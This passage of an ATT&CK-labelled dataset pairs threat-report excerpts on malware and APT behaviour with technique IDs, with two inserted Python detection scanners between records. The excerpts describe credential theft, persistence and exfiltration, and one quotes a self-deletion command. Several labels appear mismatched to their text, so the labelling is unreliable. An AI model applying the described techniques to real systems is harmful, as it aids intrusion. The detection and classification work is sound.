expand its foothold on the e-commerce company's internal network. 5) The attackers\u2019 final step was to exfiltrate data off the victim\u2019s network and onto Suckfly\u2019s infrastructure","labels":"['T1046']"}
|
|
{"text1":"Step 6: After obtaining the fully privileged handle of Taskmgr.exe, the actor uses this handle to execute cmd as high privilege process to execute install.bat","labels":"['T1218.011', 'T1134.004']"}
|
|
{"text1":"The threat actors can execute remote commands by running this specialized module with predefined actions. This module attempts to execute a command. It uses the PowerShell Invoke-Expression method for the PowerShell-based module, while its C# implementation has both cmd and PowerShell options","labels":"['T1059.003']"}
|
|
{"text1":"In another engagement, we observed the adversary using Mimikatz (the official signed version) to access credentials for logon (T1003.001: LSASS Memory","labels":"['T1003.001']"}
|
|
{"text1":"MobileOrder starts by registering itself as device administrator so that a normal user cannot uninstall it by simply clicking \u201cuninstall\u201d in settings","labels":"['T1105']"}
|
|
{"text1":"A screen capture of Trickbot\u2019s code that is structured to steal passwords from popular web browsers . It should be noted that this Trickbot variant is not capable of stealing passwords from third-party password manager applications. Screen capture of code showing possible SMB communication . networkDll32 Trickbot uses this encrypted module to scan the network and steal relevant network information. Emotet, according to previous research by Brad Duncan, is also responsible for delivering this password-grabbing Trickbot variant, as well as Azorult, to users. It's also used to inject code into its target processes using the Reflective DLL Injection technique. James\u2019s Place Bank, and Royal Bank of Scotland, and will redirect users to fake phishing websites. Trickbot\u2019s other notable tricks . Trickbot is usually sent via malicious spam campaigns. Defending against Trickbot\u2019s tricks: Trend Micro solutions . Malware authors continue to update banking trojans like Trickbot and Emotet with new modules that make it more difficult to detect and combat","labels":"['T1185']"}
|
|
{"text1":"It communicates encoded system information to a single hard coded command and control (C2) server, using the system\u2019s default User-Agent string. That malicious dll then loads encrypted shellcode from the binary, which is decrypted and runs the final BUGJUICE payload. BUGJUICE defaults to TCP using a custom binary protocol to communicate with the C2, but can also use HTTP and HTTPs if directed by the C2. SNUGRIDE is a backdoor that communicates with its C2 server through HTTP requests. Messages are encrypted using AES with a static key. The versions used by APT10 (1.3.4.0, 2.0.0.0, and 2.0.0.1) are not available via the public GitHub page, indicating that APT10 has further customized the open source version. The 2.0 versions require a dropper to decipher and launch the AES encrypted QUASARRAT payload. QUASARRAT is a fully functional .NET backdoor that has been used by multiple cyber espionage groups in the past","labels":"['T1573.001']"}
|
|
{"text1":"NewBCtestDll, NewBCtestnDll Module that is a reverse proxy and is able to execute commands. vncDll Module used as a RAT on the victim machine. vpnDll Module used to create VPN proxy routed to a given address. rdpscanDll Module used for brute forcing RDP on a certain list of targets. bcClientDllTestTest An old module used to proxy Trickbot operator traffic through a victim machine","labels":"['T1219']"}
|
|
{"text1":"While some variations exist in functionalities, the main purpose of these modules is to enumerate all documents on a compromised system and upload them to the C&C server. These file stealers can also download and execute arbitrary code from the C&C server. As with many other tools used by the Gamaredon group, they come in four different coding languages: C\/C++, C#, batch file and VBScript","labels":"['T1005']"}
|
|
{"text1":"On June 21st, 2017 an attacker breached\u00a0one of our monitored systems by brute-forcing SSH credentials using two IPs known to be part of the TOR network","labels":"['T1110']"}
|
|
{"text1":"DHS and FBI identified the threat actors leveraging remote access services and infrastructure such as VPN, RDP, and Outlook Web Access (OWA). The threat actors used the infrastructure of staging targets to connect to several intended targets","labels":"['T1114.002', 'T1133']"}
|
|
{"text1":"While investigating these files, we observed what we believe was active development on these .cmd files that helps illuminate the Gamaredon group\u2019s processes","labels":"['T1057']"}
|
|
{"text1":"Attempt to get detailed information about the operating system and hardware, such as version, patches, hotfixes, service packs, and architecture (System Information Discovery [T1082]) - Enumerate files and directories or search in specific locations of a host or network share for particular information within a file system (File and Directory Discovery [T1083]) - Get a list of security software, configurations, defensive tools, and sensors installed on the system (Software Discovery: Security Software Discovery [T1518.001]) - Procure information about running processes on a system to understand standard software running on network systems (Process Discovery [T1057]) - Identify primary users, currently logged in users, sets of users that commonly use a system, or active or inactive users (System Owner\/User Discovery [T1033]) - Enumerate browser bookmarks to learn more about compromised hosts, reveal personal information about users, and expose details about internal network resources (Browser Bookmark Discovery [T1217]) - Look for information on network configuration and system settings on compromised systems, or perform remote system discovery (System Network Configuration Discovery [T1016]) - Interact with the Windows Registry to gather information about the system, configuration, and installed software (Query Registry [T1012]) - Get a list of open application windows to learn how the system is used or give context to data collected (Application Window Discovery [T1010]) - Attempt to get a listing of local system or domain accounts in the compromised system (Account Discovery [T1087]) - Obtain a list of network connections to and from the compromised system or remote system by querying for information over the network (System Network Connections Discovery [T1049","labels":"['T1083', 'T1518.001', 'T1033', 'T1082', 'T1217']"}
|
|
{"text1":"BRONZE UNION uses various tools for credential theft. In one incident, the threat actor used the Wrapikatz tool (w.exe) with a usage statement that retrieves various passwords and Windows credentials from memory and compiles them in w.txt","labels":"['T1003.001']"}
|
|
{"text1":"Remexi boasts features that allow it to gather keystrokes, take screenshots of windows of interest (as defined in its configuration), steal credentials, logons and the browser history, and execute remote commands. Encryption consists of XOR with a hardcoded key for its configuration and RC4 with a predefined password for encrypting the victim\u2019s data","labels":"['T1027', 'T1560']"}
|
|
{"text1":"PICKPOCKET is a credential theft tool that dumps the user's website login credentials from Chrome, Firefox, and Internet Explorer to a file. This tool was previously observed during a Mandiant incident response in 2018 and, to date, solely utilized by APT34","labels":"['T1003.005', 'T1003.004', 'T1555', 'T1552.001', 'T1003.001', 'T1555.003', 'T1555.003']"}
|
|
{"text1":"Static analysis of this executable shows only two functions, but a regular number of imports. Upon detecting a debugger attached to it, the malware will display the message below and terminate the execution. This packer also hides the calls to API functions. This time instead of using a dispatcher function, the malware pushes the arguments into the stack as usual but will then perform a call to a jump table built during the unpacking, in the .text section memory region. Each entry finishes with a jmp instruction into the respective API function. Effectively the malware doesn't do any call to API functions, it always performs a jump. The end result is the same as in the packer from 2016, but with a simpler mechanism. One of the anti-analysis features included in this packer is the lack of calls to API functions. In the early stages of execution, the malware loads the libraries and retrieves the addresses from functions it needs. Feature-wise, there is no change when compared with the 2016 version, in fact when compared the C2 beaconing functions even share some of the offsets","labels":"['T1497.003']"}
|
|
{"text1":"File hunting plugin: The most frequently used plugin, similar to one used in 2014. Often used to collect Office files from temporary internet history. Detailed survey plugin: Used to gather domain membership, processes\/loaded modules, hardware enumeration, installed products, logical and mapped drive information. Evolution of earlier plugin used in 2014. Browser plugin: Used to steal browser history, stored passwords and sessions. File listing plugin: Works on local or remote drives and can map additional paths when given credentials","labels":"['T1082', 'T1083']"}
|
|
{"text1":"This function aims to download the powershell code from the command and control server and execute it","labels":"['T1105']"}
|
|
{"text1":"All three companies indicated that the actors wiped some systems by executing the KillDisk malware at the conclusion of the cyber-attack. The KillDisk malware erases selected files on target systems and corrupts the master boot record, rendering systems inoperable. It was further reported that in at least one instance, Windows-based human-machine interfaces (HMIs) embedded in remote terminal units were also overwritten with KillDisk. The actors also rendered Serial-to-Ethernet devices at substations inoperable by corrupting their firmware. The team assesses that these actions were done in an attempt to interfere with expected restoration efforts","labels":"['T1561.002']"}
|
|
{"text1":"The \u2018vsnet\u2019 plugin was intended to spread and launch a payload (BlackEnergy2 dropper itself at the moment) in the local network by using PsExec, as well as gaining primary information on the user\u2019s computer and network","labels":"['T1049']"}
|
|
{"text1":"In one case, the attackers sent a malicious document which was nearly identical to a legitimate attachment which we observed later being sent to the same recipient","labels":"['T1204.002']"}
|
|
{"text1":"The PlugX malware can be configured to use HTTP, DNS, raw TCP, or UDP to avoid network-based detection. In one sample analyzed by CTU researchers, PlugX was configured with hard-coded user credentials to bypass a proxy that required authentication. Newer HttpBrowser versions use SSL with self-signed certificates to encrypt network communications","labels":"['T1071.001', 'T1071.004', 'T1095']"}
|
|
{"text1":"The macro in the XLS file uses PowerShell to download and execute gm.exe, which is the Warzone RAT - Gm.exe bypasses UAC to run at high integrity level - Gm.exe copies itself to %programdata% with the name Images.exe and then executes it","labels":"['T1059.001']"}
|
|
{"text1":"Those files are then uploaded via unencrypted HTTP, one after another. Examining the network packets showed that they contained a string with two pieces of information: a file path and a random string of characters","labels":"['T1071.001', 'T1041']"}
|
|
{"text1":"STOLEN INFO\u2019 message \u2013 bot message to C2 with stolen information like passwords, accounts, emails, etc. Stolen information is RC4 encrypted and Base64 encoded. The key for the RC4 encryption is generated in a different way and based on the infected system ID (aka Bot ID) values, and not based on a static string as in the case of traffic encryption","labels":"['T1132.001', 'T1573.001']"}
|
|
{"text1":"mshlpweb.dll is a loader that uses a known token impersonation technique to elevate permissions and execute install.bat with high privileges. To gain higher privileges mshlpweb.dll executes the Windows Update Standalone Installer, wusa.exe. This process runs as a high-integrity process by default, since it's set to auto-elevate within its manifest","labels":"['T1218.011']"}
|
|
{"text1":"Once the VBScript has been decoded it reveals a rather complex set of functions. These implants are known as Torisma and Doris, both of which are base64 encoded. They are loaded directly into memory via a binary stream once conditions have been satisfied based on the logic contained within the script","labels":"['T1027']"}
|
|
{"text1":"First, the malware checks for the existence of a Mutex value, \u201cEKANS\u201d, on the victim. Otherwise, the Mutex value is set and encryption moves forward using standard encryption library functions. Primary functionality on victim systems is achieved via Windows Management Interface (WMI) calls, which begins executing encryption operations and removes Volume Shadow Copy backups on the victim","labels":"['T1047']"}
|
|
{"text1":"Before evidence of BlackEnergy2 use in targeted attacks was uncovered, we tracked strange activity on one of the BlackEnergy CnC servers in 2013. This strangeness\u00a0was related to values listed in newer\u00a0BlackEnergy configuration files. As described in Dmitry\u2019s 2010 Black DDoS\u2019 analysis, a configuration file is downloaded from the server by main.dll on an infected system. The config file provides download instructions for the loader. In this particular case in 2013, the config file included an unknown plugin set, aside from the usual \u2018ddos\u2019 plugin listing. Displayed below are these new, xml formatted plugin names \u201cweap_hwi\u201d, \u201cps\u201d, and \u201cvsnet\u201d in a BlackEnergy configuration file downloaded from a c2 server. This new module push must have been among the first for this group, because all of the module versions were listed as \u201cversion 1\u201d, including the ddos plugin","labels":"['T1552.001']"}
|
|
{"text1":"In mid-2018, OceanLotus carried out a campaign using documents abusing the weakness exposed by the CVE-2017-11882 vulnerability. One of the malicious documents used by OceanLotus was analysed by 360 Threat Intelligence Center (in Chinese) and includes details about the exploit. Let\u2019s take a look at a similar document","labels":"['T1203']"}
|
|
{"text1":"NOBELIUM has been observed modifying Azure AD to enable long-term persistence and access to sensitive information. This can include the creation of users, consent of Azure AD applications, granting of roles to users and applications, creation of additional service principal credentials, and more. In one incident, MSTIC observed the use of Azure RunCommand, paired with Azure admin-on-behalf-of (AOBO), as a technique to gain access to virtual machines and shift access from cloud to on-premise. NOBELIUM has demonstrated an ongoing interest in targeting privileged users, including Global Administrators. NOBELIUM is frequently observed conducting activities consistent with intelligence collection","labels":"['T1087.004']"}
|
|
{"text1":"Account 4: In the latter stage of the compromise, the threat actor used Account 1 to create Account 4, a local administrator account. Account 4 was then used to delete logs and cover tracks","labels":"['T1136.001']"}
|
|
{"text1":"Next, REvil checks the configuration field dbg to see if it\u2019s running in debug mode. If that is not the case, geolocation checks based on the system\u2019s language and the keyboard layout are conducted so the ransomware does not attempt to encrypt files on whitelisted systems. The following are whitelisted system language IDs for the analyzed sample","labels":"['T1082']"}
|
|
{"text1":"The group has the capability to set up phishing infrastructure to mimic well known websites and trick victims to enter their credentials. This is one of the main methods used by this actor to collect email addresses that later will be used to send spearphishing emails. The group is still using similar phishing models previously mentioned in the KISA report with some small changes","labels":"['T1566.001', 'T1589.002']"}
|
|
{"text1":"The export called \u201cSendDataToServer_2\u201d does exactly what the name means: it encrypts all collected data, encodes it using Base64 encoding and calls its additional library to send the data to the C2 server. The names of the C2 servers are hardcoded","labels":"['T1132.001']"}
|
|
{"text1":"The user receives a phishing email with a ZIP attachment containing an Office document with embedded macros, the document itself or a link to download malicious document. The user opens the malicious attachment\/link and is tricked into clicking \u201cEnable content\u201d. - A malicious macro is executed. One of the encrypted resources has the DLL binary (loader) which is decrypted later during runtime","labels":"['T1204.001', 'T1204.002']"}
|
|
{"text1":"Helminth relies on the following shortcut for persistence, as it runs the Trojan each time the system starts using the following command line","labels":"['T1547.001']"}
|
|
{"text1":"In at least one engagement, we observed Blue Mockingbird seemingly experimenting with different tools to create SOCKS proxies (T1090: Proxy) for pivoting. These tools included a fast reverse proxy (frp), Secure Socket Funneling (SSF), and Venom","labels":"['T1090']"}
|
|
{"text1":"Our initial discovery of GravityRAT was through a malicious Word document. We were able to discover four distinct versions of GravityRAT, developed over two years","labels":"['T1559.002']"}
|
|
{"text1":"The use of the choice command, as seen below, did not appear in previous versions of OopsIE and appears to have been added in the most recent version used in this attack. cmd.exe \/C choice \/C Y \/N \/D Y \/T 2 & Del After sleeping, the Trojan will create a GUID and write it to %APPDATA%\\Windows\\GDI.bin. With the Trojan moved to its final location, it will then create a scheduled task to run a VBScript to make sure it runs persistently. The Trojan accesses two resources, named Sch and VBS, that contain obfuscated strings that contain the command to create the scheduled task and the VBScript to run. This differs from the previous OopsIE variant that used a hardcoded task name for the scheduled task. This process ultimately attempts to run the Trojan every three minutes, which is important as OopsIE relies on this scheduled task as it does not include a main loop to continue its execution. After creating this scheduled task for persistence, the Trojan will begin communicating with its C2 server. The process in which the Trojan communicates with its C2 server is very similar to the previous OopsIE Trojan that we discussed in our previous blog. Also, the oops string used to signify an erroneous transmission from the C2, which gave OopsIE its name, is reversed to spoo. The command handler in this OopsIE variant is very similar to the previous version, as it contains the same three (1, 2 and 3) commands seen in Table 2","labels":"['T1059.005']"}
|
|
{"text1":"Waterbear employs a modular approach to its malware. It utilizes a DLL loader to decrypt and execute an RC4-encrypted payload. Sometimes, the hardcoded file paths of the encrypted payloads are not under Windows native directories (e.g. It is also possible that the attackers use Waterbear as a secondary payload to help maintain presence after gaining some levels of access to the targets\u2019 systems. The evidence is that Waterbear frequently uses internal IPs as its own C&C servers (for instance,\u00a0b9f3a3b9452a396c3ba0ce4a644dd2b7f494905e820e7b1c6dca2fdcce069361 uses an internal IP address of\u00a010[.]0[.]0[.]211 as its C&C server","labels":"['T1027']"}
|
|
{"text1":"Throughout the spear-phishing campaign, the threat actors used email attachments to leverage legitimate Microsoft Office functions for retrieving a document from a remote server using the Server Message Block (SMB) protocol. After obtaining a credential hash, the threat actors can use password-cracking techniques to obtain the plaintext password. With valid credentials, the threat actors are able to masquerade as authorized users in environments that use single-factor authentication","labels":"['T1598.002']"}
|
|
{"text1":"Sodinokibi gathers some basic system information and saves it to the registry together with the generated encryption parameters. If the dbg option is not set in the config, the UI language and keyboard layout values are checked, and the malware will simply exit on systems which use one of the following language codes","labels":"['T1112', 'T1082']"}
|
|
{"text1":"The backdoor installation sequence shows that it\u2019s meant for persistence via \/LaunchAgents\/com.aex-loop.agent.plist and \/Library\/LaunchDaemons\/com.aex-loop.agent.plist. It initiates the configuration file \/Library\/Caches\/com.applestore.db to set the C&C server IP and for remote session information. Loading the bot plugins, this enables connection to the server to open and wait for commands, update the configuration file based on the commands received, and encrypt the file via AES CBC. If the configuration file already exists, it will decrypt once a new session starts","labels":"['T1027']"}
|
|
{"text1":"Cisco Talos has discovered a new malware campaign based on a previously unknown family we're calling \"PoetRAT\". The droppers are Microsoft Word documents that deploy a Python-based remote access trojan (RAT). We named this malware PoetRAT due to the various references to William Shakespeare, an English poet and playwright. The RAT has all the standard features of this kind of malware, providing full control of the compromised system to the operation. For exfiltration, it uses FTP, which denotes an intention to transfer large amounts of data. The campaign shows us that the operators manually pushed additional tools when they needed them on the compromised systems. We will describe a couple of these tools. The most interesting is a tool used to monitor the hard disk and exfiltrate data automatically. Besides these, there are keyloggers, browser-focused password stealers, camera control applications, and other generic password stealers","labels":"['T1555.003']"}
|
|
{"text1":"The final payload is a ZIP archive that is usually encrypted by the algorithm shown in Figure 8 and, in a significant number of cases, we saw it being password-protected as well","labels":"['T1027', 'T1027']"}
|
|
{"text1":"In order to pull down the backdoor, a payload stager, either HTTP or reverse-DNS, is executed with the use of a scheduled task","labels":"['T1053.005']"}
|
|
{"text1":"PDB Path: C:\\Users\\803\\Desktop\\ytyboth\\yty 2.0\\Release\\vstservice.pdb The vstservice.exe plugin is .NET file responsible for sending a list of the file system to the C2. The malware retrieves the C2 from a Google Docs file like the previous binaries. The file was located at the following location","labels":"['T1005']"}
|
|
{"text1":"In one sample we analyzed, the zip file contains a VBS file named NUM_56960.vbs. The size of the file is around 30MB. The large file size helps it evade detection, as file scanners usually skip scanning huge files for performance reasons. This VBS file then downloads the malicious executable file PaintHelper.exe","labels":"['T1027.001']"}
|
|
{"text1":"The Maze-delivered virtual machine was running Windows 7, as opposed to the Windows XP VM distributed in the Ragnar Locker incident. In this case, Cryptoguard was preventing the malware from encrypting files by intercepting and neutralizing the Windows APIs that the ransomware was attempting to use to encrypt the hard drive. Weaponized virtual machine . The Maze attackers delivered the attack components for the third attack in the form of an .msi installer file. The root of that virtual disk contained three files associated with the Maze ransomware: preload.bat, vrun.exe, and a file just named payload (with no file extension), which is the actual Maze DLL payload. The Maze attackers took a slightly different approach, using a virtual Windows 7 machine instead of XP. The virtual machine (VM) that Sophos extracted from the Maze attack shows that this (newer) VM is configured in such a way that it allows easy insertion of another ransomware on the attacker\u2019s \u2018builder\u2019 machine. But the cost in terms of size is significant: The Ragnar Locker virtual disk was only a quarter the size of the nearly 2GB virtual disk used in the Maze attack\u2014all just to conceal one 494 KB ransomware executable from detection. The attackers also executed the following commands on the host computer during the Maze attack: This ran the Microsoft Installer that installs VirtualBox and the virtual hard drive. They stop the Volume Shadow Copy service; the ransomware itself includes a command to delete existing shadow copies. The Maze threat actors have proven to be adept at adopting the techniques demonstrated to be successful by other ransomware gangs, including the use of extortion as a means to extract payment from victims","labels":"['T1047']"}
|
|
{"text1":"Using job opportunities as a template is the known method used by Lazarus to target its victims. The documents created by this actor are well designed and contain a large icon for a known company such as Lockheed Martin, BAE Systems, Boeing and Northrop Grumman in the template. In this campaign the actor has targeted people that are looking for job opportunities at Lockheed Martin. The document\u2019s metadata used in this campaign links them to several other documents used by this actor in the past","labels":"['T1027']"}
|
|
{"text1":"Windows Defender ATP displays these activities as process trees in a machine timeline for the infected computer. Analysts can easily extract detailed information from these trees, such as the implant DLL dropped by the installer, the command used to call rundll32.exe and load the DLL, and the registry modifications that set the DLL as a service","labels":"['T1543.003']"}
|
|
{"text1":"The function of this tool is to set up a TCP listener on a localhost, receive encoded data via requests from the\u202fSodomNormal\u202flocalhost module, and to forward this data to the command and control IP via HTTP. The GUP Proxy Tool has a hardcoded configuration which is included as both strings and integers","labels":"['T1036.005']"}
|
|
{"text1":"Downloaded payload is a variant of a cloud-based RAT known as RokRat which has been used by this group since 2017. This RAT is known to steal data from a victim\u2019s machine and send them to cloud services (Pcloud, Dropbox, Box, Yandex","labels":"['T1567.002']"}
|
|
{"text1":"Sandbox check and anti-virus product enumeration - Dropping payload \u2018netmgr.exe\u2019 - Creating a registry key for persistence - Creating a registry key for deletion of the dropper","labels":"['T1547.001']"}
|
|
{"text1":"Several files were downloaded to our Struts2 honeypot from the Chinese repository site gitee.com for a user named \"c-999\". Around the same time, we observed similar activity pulling down files from a gitlab.com repository page for a user named \"c-18\". All the repositories had a folder called \"ss\" that contained 16 files. The files were a collection of ELF executables, shell scripts, and text files that execute a variety of actions, including achieving persistence and the execution of an illicit cryptocurrency miner. Once the threat actor had compromised a system, they achieved persistence on the device by installing a cron job that downloads and executes a file \"logo.jpg\" from \"3389[.]space\". This file is a shell script which, in turn, downloads mining executables from the threat actor's Git repositories and saves them under the filename \"java\". The exact file downloaded depends on the victim's system architecture","labels":"['T1053.003']"}
|
|
{"text1":"Note that regardless of whether Nyetya is successful in overwriting the boot sector or not, it will proceed to create a scheduled task via schtasks to reboot the system one hour after infection","labels":"['T1529', 'T1053.005']"}
|
|
{"text1":"Upon execution, Pay2Key is reading the Server and Port keys from the configuration file. If a configuration file was not found in the current working directory and wasn\u2019t supplied in the command line arguments, the ransomware will write \u201cno config file found\u201d to a file at .\\Cobalt-Client-log.txt. This log file will be used extensively by the ransomware during its execution. Newer versions of the ransomware are making sure to remove this log file from the disk. The full list of supported log messages can be found in the appendix section of this article","labels":"['T1070.004']"}
|
|
{"text1":"This script simply checks the operating system of the victim and downloads the respective payload again using the certutil executable. In this particular instance, the payload is encoded via base64, which certutil decodes. The payload in question is a CAB file that is then unpacked. Finally, the malware executes the extracted install.bat script before deleting the original files and exiting","labels":"['T1027']"}
|
|
{"text1":"Path \u2013 location of the root \u201cstash\u201d directory - Ext \u2013 search for files with one of these extensions only - Date \u2013 search for files not earlier than this date","labels":"['T1083']"}
|
|
{"text1":"TA505 continued distributing Dridex through early June 2017 using a range of email attachments. Most recently these included PDF attachments with embedded Microsoft Word documents bearing malicious macros that call PowerShell commands that install Dridex","labels":"['T1566.001']"}
|
|
{"text1":"The Delphi variant of Zebrocy delivered in this attack campaign is very similar to the Delphi downloader discussed in our previous Zebrocy research published in June 2018. While this Delphi variant was known, the C# and VB.NET variants delivered in this attack campaign were previously unknown. An interesting note on these payloads is that all the Delphi payloads delivered in this campaign were packed with UPX, while none of the other payloads were packed. While we can only speculate on the specific reason, it is likely Sofacy packed only the Delphi variants in an attempt to increase evasion, as the Delphi variant of Zebrocy is known and has been widely analyzed","labels":"['T1027.002']"}
|
|
{"text1":"While PotPlayerDB.dat is a variant of PlugX malware, TA416 has updated the payload by changing both its encoding method and expanding the payload\u2019s configuration capabilities. Historically, TA416 relied on the DLL launcher to decode the PlugX payload utilizing an XOR key included at the offset 0 within the PlugX DAT configuration file. One of the main ways it does this is by resolving API functions during runtime. Generally, malware loads a DLL, iterates over the set of exports of the DLL and hashes the string, looking for a matching hash. This iteration of PlugX does standard API hashing, but only to resolve the address of the functions GetProcAddress as well as LoadLibrary. Once those functions are resolved properly, it loads the rest of the functions via their text name","labels":"['T1027']"}
|
|
{"text1":"Torisma uses this method to send data back to the C2 server read from the named pipe. This is the results of the execution of the shellcode on the victim\u2019s system through the ViewPrevPage action and the results of this execution are sent and processed using this function","labels":"['T1041']"}
|
|
{"text1":"Summary In early May, Unit 42 discovered an attack campaign against at least one defense company in Russia and one unidentified organization in South Korea delivering a variant of Bisonal malware. While not previously publicly documented, the variant has been in the wild since at least 2014. There are three primary differences between it and older Bisonal malware including a different cipher and encryption for C2 communication, and a large rewrite of the code for both network communication and maintaining persistence. To date, we have only collected 14 samples of this variant, indicating it may be sparingly used. The adversary behind these attacks lured the targets into launching the Microsoft Windows executable malware by masquerading it as a PDF file (using a fake PDF icon) and reusing publicly available data for the decoy PDF file\u2019s contents. Attacks using Bisonal have been blogged about in the past. We believe it is likely these tools are being used by one group of attackers. Though Bisonal malware has been in the wild for at least seven years and frequently updated, the actors keep using same high-level playbooks. Common features of attacks involving Bisonal include","labels":"['T1059.003']"}
|
|
{"text1":"Mustang Panda APT uses a package of binaries to load the actual payload and it is intentionally designed this way to bypass file scanners and sandboxes. Obviously, file scanners or sandboxes can\u2019t detect the PlugX payload without the encrypted DAT file","labels":"['T1027.001']"}
|
|
{"text1":"HOLMIUM has been observed using various vectors for initial access, including spear-phishing email, sometimes carrying archive attachments that exploit the CVE-2018-20250 vulnerability in WinRAR, and password-spraying. Many of their recent attacks, however, have involved the penetration testing tool Ruler used in tandem with compromised Exchange credentials","labels":"['T1110.003']"}
|
|
{"text1":"Completing missions typically involves gathering and transferring information out of the target network, which may involve moving files through multiple systems before reaching the destination. APT40 has been observed consolidating files acquired from victim networks and using the archival tool rar.exe to compress and encrypt the data before exfiltration. We have also observed APT40 develop tools such as PAPERPUSH to aid in the effectiveness of their data targeting and theft","labels":"['T1560.001']"}
|
|
{"text1":"L\"ServicesActive\": This string is passed to the OpenSCManagerW API as the database name (SERVICES_ACTIVE_DATABASE) to open the active services database. \u201cexpand 32-byte k\u201d and \u201cexpand 16-byte k\u201d: The constants used by the Salsa20 symmetric encryption algorithm","labels":"['T1106']"}
|
|
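The Salsa20 constants in the record above are a useful hunting artefact, but only if you search for them the way compilers actually emit them. The following is an added example, not code from the source report: a Python scanner that looks for the sigma ("expand 32-byte k") and tau ("expand 16-byte k") constants both as contiguous strings and as four separate little-endian dword immediates, which is how they usually appear once the key-setup routine has been compiled. The byte blob it is run against is constructed for the example; the 16-byte maximum gap between immediates is an assumption tuned for x86 mov-immediate sequences.

```python
"""Find Salsa20 'sigma'/'tau' constants in a binary blob.

Added example (not from the original report). The strings
"expand 32-byte k" and "expand 16-byte k" are the Salsa20 initialisation
constants (ChaCha reuses the 32-byte one, so a hit means "Salsa20 family").
In compiled code they are frequently not stored as one contiguous string but
as four 32-bit immediates ("expa", "nd 3", "2-by", "te k"), so a naive string
search misses them. This scanner checks both forms.
"""

SIGMA = b"expand 32-byte k"   # 256-bit key variant
TAU = b"expand 16-byte k"     # 128-bit key variant


def _words(const: bytes) -> list[bytes]:
    """Split a 16-byte constant into the four dwords a compiler would emit."""
    return [const[i:i + 4] for i in range(0, 16, 4)]


def find_salsa_constants(blob: bytes, max_gap: int = 16) -> list[dict]:
    """Return every sigma/tau occurrence, contiguous or split into dwords.

    max_gap (assumption): how many bytes of other code may separate two
    consecutive immediates; 16 covers a 7-byte mov-imm32 plus a few bytes.
    """
    hits = []
    for name, const in (("sigma", SIGMA), ("tau", TAU)):
        # 1) contiguous string (data section, or a memcpy'd literal)
        start = 0
        while (idx := blob.find(const, start)) != -1:
            hits.append({"constant": name, "offset": idx, "form": "contiguous"})
            start = idx + 1
        # 2) four dwords in order, each within max_gap bytes of the previous one
        w0, w1, w2, w3 = _words(const)
        start = 0
        while (idx := blob.find(w0, start)) != -1:
            pos, ok = idx, True
            for w in (w1, w2, w3):
                nxt = blob.find(w, pos + 4, pos + 4 + max_gap)
                if nxt == -1:
                    ok = False
                    break
                pos = nxt
            # pos - idx == 12 is just the contiguous string seen again
            if ok and pos - idx > 12:
                hits.append({"constant": name, "offset": idx, "form": "split"})
            start = idx + 1
    return hits


# Constructed sample: a fake code fragment where "expand 32-byte k" appears as
# four dword immediates separated by opcode bytes (as x86 mov-immediates would
# leave it), followed by a contiguous "expand 16-byte k".
SAMPLE = (
    b"\x90" * 8
    + b"\xc7\x45\xf0" + b"expa"
    + b"\xc7\x45\xf4" + b"nd 3"
    + b"\xc7\x45\xf8" + b"2-by"
    + b"\xc7\x45\xfc" + b"te k"
    + b"\x90" * 16
    + TAU
    + b"\x00" * 8
)

if __name__ == "__main__":
    for hit in find_salsa_constants(SAMPLE):
        print(hit)
```

Because the split form is matched dword by dword, the scanner also catches the common case where the compiler has spread the four stores across neighbouring instructions; a plain `strings`-style search only reports the contiguous form.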
{"text1":"It creates the folder \"\\ProgramData\\AuditService\\\" and copies the clean file \"lsass.exe\" (taken from \"\\Windows\\System32\\\") into the folder. The tainted \"services.exe\" installs \"\\ProgramData\\AuditService\\lsass.exe\" as an autostart Windows service named \"Audit Service\". When the new \"lsass.exe\" service autostarts, the malicious file \"sspisrv.dll\" sideloads from the same folder. \"lsass.exe\" will eventually crash because of a failure to load other dependencies","labels":"['T1543.003', 'T1569.002']"}
|
|
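The Audit Service trick in the record above (a clean copy of lsass.exe registered as a service from ProgramData so that a DLL beside it is side-loaded) is cheap to hunt for: any service whose image filename matches a well-known Windows system binary but whose image path is outside System32/SysWOW64 deserves a look. The following is an added example, not code from the report: a Python check over a constructed service list, with the set of "system binary" names and the trusted directories being assumptions you would extend for your estate.

```python
"""Flag services whose binary borrows a System32 executable's name from elsewhere.

Added example, not from the original report. For every service, if the image
filename is a well-known Windows system binary but the image directory is not
System32 or SysWOW64, report it. SYSTEM_BINARIES and TRUSTED_DIRS are
assumptions for the example; the service list is constructed.
"""
import ntpath
from dataclasses import dataclass

SYSTEM_BINARIES = {"lsass.exe", "services.exe", "svchost.exe", "csrss.exe",
                   "winlogon.exe", "wininit.exe", "spoolsv.exe"}
TRUSTED_DIRS = (r"c:\windows\system32", r"c:\windows\syswow64")


@dataclass
class Service:
    name: str
    image_path: str   # the registry ImagePath value, possibly quoted and with arguments
    start: str        # "auto" / "manual" / "disabled"


def _exe_from_image_path(image_path: str) -> str:
    """ImagePath may be quoted and carry arguments; return just the binary path."""
    p = image_path.strip()
    if p.startswith('"'):
        return p[1:].split('"', 1)[0]
    return p.split(" ", 1)[0]


def suspicious_services(services: list[Service]) -> list[dict]:
    """Return findings for system-binary names launched from untrusted directories."""
    findings = []
    for svc in services:
        exe = _exe_from_image_path(svc.image_path)
        folder, fname = ntpath.split(exe)
        if fname.lower() in SYSTEM_BINARIES and folder.lower() not in TRUSTED_DIRS:
            findings.append({
                "service": svc.name,
                "binary": fname.lower(),
                "dir": folder,
                "autostart": svc.start == "auto",   # persistence, as in the report
            })
    return findings


# Constructed sample modelled on the report: two legitimate entries plus the planted one.
SAMPLE = [
    Service("Spooler", r"C:\Windows\System32\spoolsv.exe", "auto"),
    Service("wuauserv", r"C:\Windows\system32\svchost.exe -k netsvcs -p", "manual"),
    Service("Audit Service", r"C:\ProgramData\AuditService\lsass.exe", "auto"),
]

if __name__ == "__main__":
    for f in suspicious_services(SAMPLE):
        print(f)
```

On a live host the same logic runs over the output of `Get-CimInstance Win32_Service` (Name, PathName, StartMode); the point of the directory test rather than a hash test is that the planted lsass.exe is a genuine, correctly signed Microsoft binary, so only its location gives it away.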
{"text1":"Companies in multiple sectors are targeted in this campaign, including those operating in the automotive, pharmaceutical, and engineering sector, as well as managed service providers (MSPs)","labels":"['T1078']"}
|
|
